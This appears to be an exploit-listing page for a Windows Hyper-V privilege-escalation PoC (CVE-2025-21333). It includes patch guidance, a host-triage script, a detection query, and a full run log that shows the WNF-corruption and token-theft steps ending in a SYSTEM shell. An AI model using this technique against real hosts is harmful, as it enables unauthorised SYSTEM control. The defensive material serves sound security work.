## https://sploitus.com/exploit?id=ABF7750F-36A7-55DD-8333-1B613EA02E59
# CVE-2025-21333 Windows Hyper-V NT Kernel Integration VSP Elevation of Privilege Vulnerability ‼️
# Description:
CVE‑2025‑21333 is a high-severity elevation of privilege vulnerability in Windows Hyper‑V’s NT Kernel Integration Virtualization Service Provider (VSP), allowing a local, authenticated attacker to escalate to SYSTEM privileges. Here's a detailed breakdown:
# 🔍 Overview:
+ Type: Heap‑based buffer overflow (CWE‑122) in the Hyper‑V NT Kernel Integration VSP component.
+ CVSS v3.1: 7.8 (High 🔴) — Attack Vector: Local, Complexity: Low, Privileges: Low, No user interaction, Full impact on confidentiality, integrity, availability.
# ⚠️ Impact:
+ A local, low-privileged user on an affected host can trigger the flaw in the NT Kernel Integration VSP driver (vkrnlintvsp.sys) and run code as SYSTEM. The PoC below does exactly that from an unprivileged account: it starts Windows Sandbox, triggers the bug through NtCreateCrossVmEvent, and uses corrupted WNF state data as its kernel read/write primitive (see the run log).
+ SYSTEM on the host means full control: reading any data on the host, tampering with or breaking the isolation of the guests it runs, installing persistence, and pivoting to other systems.
# 🛡️ Patching & Mitigation:
1. Patch released: Microsoft addressed this in the January 14, 2025 Patch Tuesday update.
2. Accelerated response: The U.S. CISA added it to the Known Exploited Vulnerabilities catalog on January 14, 2025, mandating remediation by February 4, 2025.
3. Apply updates immediately: make sure every Hyper‑V host (Windows 10/11, Server 2022/2025, etc.), and every client with Windows Sandbox or another feature that loads vkrnlintvsp.sys enabled, is on the January 2025 build or later for its version (see the affected list below).
# 🖥️ Affected Systems (Examples):
+ Windows 10 21H2, 22H2
+ Windows 11 22H2, 23H2, 24H2 (x86/ARM64)
+ Windows Server 2022 23H2 & Server 2025 builds
+ Any host on a build below the patched build for its version is affected.
The hashes below are those of the VSP driver and the kernel on the test host used for the PoC run (build 10.0.22631.4460, a Windows 11 23H2 build that predates the fix):
```powershell
PS C:\Windows\System32\drivers> get-filehash .\vkrnlintvsp.sys
Algorithm Hash Path
--------- ---- ----
SHA256 28948C65EF108AA5B43E3D10EE7EA7602AEBA0245305796A84B4F9DBDEDDDF77 C:\Windows\System32\drivers\v...
PS C:\Windows\System32\drivers>
```
```powershell
PS C:\Windows\System32> Get-FileHash ntoskrnl.exe
Algorithm Hash Path
--------- ---- ----
SHA256 999C51D12CDF17A57054068D909E88E1587A9A715F15E0DE9E32F4AA4875C473 C:\Windows\System32\ntoskrnl.exe
PS C:\Windows\System32>
```
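An added triage script (not from the PoC repository) that checks a host for the things this section lists: the OS build against the January 2025 patched build for its version, the hash and file version of vkrnlintvsp.sys against the hash shown above, and whether the Windows Sandbox feature the PoC depends on is enabled. The patched build floors in the table and the `Containers-DisposableClientVM` feature name are assumptions on my part; confirm them against the MSRC advisory and your own hosts before acting on the output.

```powershell
# Added example: host triage for CVE-2025-21333 exposure. Not part of the PoC repo.
# Assumptions (verify against the MSRC advisory before relying on them):
#   - the UBR floors below are the January 14, 2025 patched builds for each build line;
#   - the SHA256 is the vkrnlintvsp.sys hash the README shows for its (unpatched) test host.
$ErrorActionPreference = 'Stop'

# Assumed first patched UBR per major build number.
$patchedFloor = @{
    19044 = 5371   # Windows 10 21H2
    19045 = 5371   # Windows 10 22H2
    22621 = 4751   # Windows 11 22H2
    22631 = 4751   # Windows 11 23H2 (the README's test host was 22631.4460)
    25398 = 1369   # Windows Server 2022, 23H2 edition
    26100 = 2894   # Windows 11 24H2 / Windows Server 2025
}
$readmeVulnerableDriverHash = '28948C65EF108AA5B43E3D10EE7EA7602AEBA0245305796A84B4F9DBDEDDDF77'

# 1. OS build and update level from the registry (CurrentBuildNumber.UBR).
$cv    = Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion'
$build = [int]$cv.CurrentBuildNumber
$ubr   = [int]$cv.UBR
Write-Host "[*] OS build $build.$ubr ($($cv.DisplayVersion))"

if ($patchedFloor.ContainsKey($build)) {
    if ($ubr -ge $patchedFloor[$build]) {
        Write-Host "[+] build is at or above the assumed patched floor $build.$($patchedFloor[$build])"
    } else {
        Write-Warning "build is below the assumed patched floor $build.$($patchedFloor[$build]): treat as vulnerable"
    }
} else {
    Write-Warning "build $build is not in the table; check the advisory manually"
}

# 2. The vulnerable component itself: present? which version? same binary as the README's test host?
$drv = Join-Path $env:SystemRoot 'System32\drivers\vkrnlintvsp.sys'
if (Test-Path $drv) {
    $hash = (Get-FileHash -Algorithm SHA256 -Path $drv).Hash
    $ver  = (Get-Item $drv).VersionInfo.FileVersion
    Write-Host "[*] vkrnlintvsp.sys version $ver sha256 $hash"
    if ($hash -eq $readmeVulnerableDriverHash) {
        Write-Warning "vkrnlintvsp.sys matches the README's unpatched test binary"
    }
} else {
    Write-Host "[*] vkrnlintvsp.sys not present on this host"
}

# 3. The PoC launches WindowsSandboxClient.exe, so report whether Windows Sandbox is enabled.
#    Feature name is an assumption; the query needs an elevated shell.
try {
    $sb = Get-WindowsOptionalFeature -Online -FeatureName 'Containers-DisposableClientVM'
    Write-Host "[*] Windows Sandbox feature state: $($sb.State)"
} catch {
    Write-Warning "could not query optional features (run elevated): $_"
}
```

Run it from an elevated PowerShell on each Hyper‑V host or Sandbox-capable client; a build below the floor, or a driver hash equal to the one above, means the January 2025 update has not been applied.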
# Compile and Run:
Build the x64 Release configuration and run the binary as an unprivileged user on a vulnerable host that has Windows Sandbox available. The PoC starts WindowsSandboxClient.exe itself if it is not already running (the `[!]` and `[*] spawning windows sandbox` lines below), triggers the bug, and drops into a cmd.exe running as SYSTEM.
```
PS C:\Users\unpriv> .\CVE-2025-21333-POC.exe
Preparing...
[*] fNtCreateCrossVmEvent = 00007FFD6BC31690
[*] fNtQueryInformationProcess = 00007FFD6BC304E0
[!] WindowsSandboxClient.exe process not found
[*] spawning windows sandbox
[*] CreateProcessA returned successfully
[*] NtQueryInformationProcess returned successfully
[*] peb_addr = 0000000100335000
[*] ReadProcessMemory returned successfully
[*] ProcessParameters = 00000147B06A6430
[*] ReadProcessMemory returned successfully
[*] CommandLine = 00000147B06A6ADA
[*] CommandLine_size = 3f0
[*] commandline = C:\Windows\system32\WindowsSandboxClient.exe <ContainerId>19a1ef14-ee35-47d8-8bdb-cf4c86272272</ContainerId><AccountUser>WDAGUtilityAccount</AccountUser><AccountPassword>66387310-a27d-4a59-a688-3ab018388c9e</AccountPassword><AudioInputEnabled>true</AudioInputEnabled><ClipboardRedirectionEnabled>true</ClipboardRedirectionEnabled><RebootSupported>true</RebootSupported><SmartCardRedirectionEnabled>false</SmartCardRedirectionEnabled><FullScreenMode>false</FullScreenMode><TargetDisplay>0</TargetDisplay>
[*] extracted guid = 19a1ef14-ee35-47d8-8bdb-cf4c86272272
[*] s_guid = 19a1ef14-ee35-47d8-8bdb-cf4c86272272
Created GUID
extracted guid
0x000000: 14 ef a1 19 35 ee d8 47 8b db cf 4c 86 27 22 72 ....5..G...L.'"r
guid
0x000000: 14 ef a1 19 35 ee d8 47 8b db cf 4c 86 27 22 72 ....5..G...L.'"r
Triggering vuln creating crossvmevent...
max corrupted WNF
state: a18d294541c64e6d val: 0 dataSize: 10040
calling NtqueryWnfStateData on max_corrupted with max_corrupted->state a18d2945a18d2945 and datasize10040
buffer content
[+] found WNF to be freed and replaced with RegBuffers
offset 30
[+] found WNF to be freed and replaced with PipeAttribute
offset2 80
updating regBuffersControllerWNF
calling NtUpdateWnfStateData on tokenReaderWNF->state a18d2945a18d2945 and datasize10040
calling NtUpdateWnfStateData returned successfully
[*] retrieving WNF with content 0x4343434343434343
[*] retrieving WNF with content 0x4444444444444444
searching in statenames2
found corrupted WNF: a18d514541c64e6dval: 4343434343434343
found corrupted WNF: a18d614541c64e6dval: 4444444444444444
found1 1 found2 1
found1 1 found2 1
found1 1 found2 1
0x000000: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0x000010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0x000020: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0x000030: 00 00 05 0b 49 72 52 42 64 b9 76 d3 e4 ff d1 c6 ....IrRBd.v.....
0x000040: a0 a1 b1 f1 09 e3 ff ff 00 00 00 00 00 00 00 00 ................
0x000050: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0x000060: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0x000070: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0x000080: 00 00 05 03 4e 70 41 74 00 00 00 00 00 00 00 00 ....NpAt........
0x000090: d0 01 2b 47 0a d1 ff ff d0 01 2b 47 0a d1 ff ff ..+G......+G....
0x0000a0: 38 81 2a 4d 0a d1 ff ff 16 00 00 00 00 00 00 00 8.*M............
0x0000b0: 3a 81 2a 4d 0a d1 ff ff 5a 00 41 41 41 41 41 41 :.*M....Z.AAAAAA
0x0000c0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0x0000d0: 00 00 05 03 57 6e 66 20 42 42 42 42 42 42 42 42 ....Wnf BBBBBBBB
0x0000e0: 00 00 00 00 50 ff 00 00 50 ff 00 00 01 00 00 00 ....P...P.......
0x0000f0: 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0x000100: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0x000110: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0x000120: 00 00 05 03 57 6e 66 20 42 42 42 42 42 42 42 42 ....Wnf BBBBBBBB
0x000130: 00 00 00 00 00 ff 00 00 00 ff 00 00 01 00 00 00 ................
0x000140: 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
[+] regBuffers found and can be overwritten
[+] pipeAttribute found and can be read
[*] original_regBufferEntry: ffffe309f1b1a1a0
[*] pipeAttributeFlink: ffffd10a472b01d0
[+] found target handle
[*] targetHandle: 00000211216BC4D0
[*] ioring index: 425
[*] fileObject: ffffe309f134d7e0
[*] base of npfs.sys: fffff80631660000
[*] base of ntoskrnl.exe: fffff80628c00000
[*] system EPROCESS: ffffe309ea4c2040
[*] system TOKEN: ffffd10a3a246040
[*] curpid: 21c8
Microsoft Windows [Version 10.0.22631.4460]
(c) Microsoft Corporation. All rights reserved.
C:\Users\unpriv>whoami
nt authority\system
C:\Users\unpriv>exit
calling NtUpdateWnfStateData returned successfully
PS C:\Users\unpriv>
```
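An added hunting query, not part of the PoC, that looks in Security event 4688 (process creation) for the two things the run log above makes visible: the PoC starting WindowsSandboxClient.exe from its own process rather than through the normal Windows Sandbox launcher, and a SYSTEM cmd.exe whose parent is an executable in a user profile directory. It assumes 4688 auditing with command-line logging is on, that you run it elevated, and that in normal use WindowsSandboxClient.exe is started by WindowsSandbox.exe (an assumption to confirm on a clean host); the function name is mine.

```powershell
# Added hunting example for the process pattern in the PoC run log. Not part of the PoC repo.
# Assumptions, to verify in your own environment:
#   - 4688 auditing with command-line logging is enabled and this runs elevated;
#   - normally WindowsSandboxClient.exe is started by WindowsSandbox.exe, so any other parent is odd;
#   - once the PoC holds the SYSTEM token, the cmd.exe it spawns is logged with SubjectUserSid
#     S-1-5-18 and a ParentProcessName under C:\Users\ (the PoC binary in the user's profile).
function Find-SandboxEoPSignals {
    param([datetime]$Since = (Get-Date).AddDays(-7))

    $filter = @{ LogName = 'Security'; Id = 4688; StartTime = $Since }
    $events = Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue

    foreach ($e in $events) {
        # Flatten the EventData XML into a name -> value table.
        $x = [xml]$e.ToXml()
        $d = @{}
        foreach ($n in $x.Event.EventData.Data) { $d[$n.Name] = $n.'#text' }

        $new    = $d['NewProcessName']
        $parent = $d['ParentProcessName']
        $signal = $null

        if ($new -like '*\WindowsSandboxClient.exe' -and $parent -notlike '*\WindowsSandbox.exe') {
            $signal = 'WindowsSandboxClient.exe started by an unexpected parent'
        }
        elseif ($new -like '*\cmd.exe' -and $d['SubjectUserSid'] -eq 'S-1-5-18' -and $parent -like 'C:\Users\*') {
            $signal = 'SYSTEM cmd.exe spawned from an executable in a user profile'
        }

        if ($signal) {
            [pscustomobject]@{
                Time    = $e.TimeCreated
                Signal  = $signal
                Subject = "$($d['SubjectDomainName'])\$($d['SubjectUserName'])"
                Process = $new
                Parent  = $parent
                Command = $d['CommandLine']
            }
        }
    }
}

Find-SandboxEoPSignals | Format-Table -AutoSize -Wrap
```

Both rules are cheap to evaluate and specific to what the PoC does, but neither is proof of exploitation on its own: an administrator running a tool from their profile as SYSTEM will trip the second rule, so review the Parent and Command columns rather than alerting blindly.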
# Disclaimer ⚠️
For educational and research purposes only. Use only against systems you own or have permission to test.